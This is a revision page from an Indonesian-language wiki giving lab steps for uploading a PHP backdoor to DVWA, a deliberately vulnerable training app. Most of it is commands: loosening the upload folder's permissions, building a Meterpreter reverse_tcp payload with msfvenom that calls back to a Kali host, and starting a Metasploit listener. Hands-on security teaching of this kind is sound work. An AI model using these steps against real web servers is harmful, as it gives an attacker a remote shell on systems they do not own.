DVWA: Upload PHP Backdoor: Difference between revisions

From OnnoCenterWiki
Jump to navigationJump to search
← Older editNewer edit →
Onnowpurbo (talk | contribs)
69,477 edits
Onnowpurbo (talk | contribs)
69,477 edits
Onnowpurbo (talk | contribs)
69,477 edits
Line 27: Line 27:


===Start Payload Listener===
===Start Payload Listener===
Jalankan
msfconsole
Ketik
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.0.2
set LPORT 4444
exploit


==Referensi==
==Referensi==


* http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson8/index.html
* http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson8/index.html

Revision as of 02:34, 27 May 2017

sumber: http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson8/index.html

Di Server DVWA

Ubah ijin folder uploads 

sudo su
chown www-data.www-data /var/www/html/DVWA-1.9/hackable/uploads/
chmod 775 /var/www/html/DVWA-1.9/hackable/uploads/
ls -ld /var/www/html/DVWA-1.9/hackable/uploads/

Di Kali Linux

Cek ip address

ifconfig

Misalnya IP address kali linux adalah 192.168.0.2

Buat PHP msfpayload

mkdir -p /root/backdoor
cd /root/backdoor
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 R > PHONE_HOME.php
ls -l PHONE_HOME.php


Start Payload Listener

Jalankan 

msfconsole

Ketik 

use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.0.2
set LPORT 4444
exploit

Referensi

Retrieved from "https://lms.onnocenter.or.id/wiki/index.php?title=DVWA:_Upload_PHP_Backdoor&oldid=48177"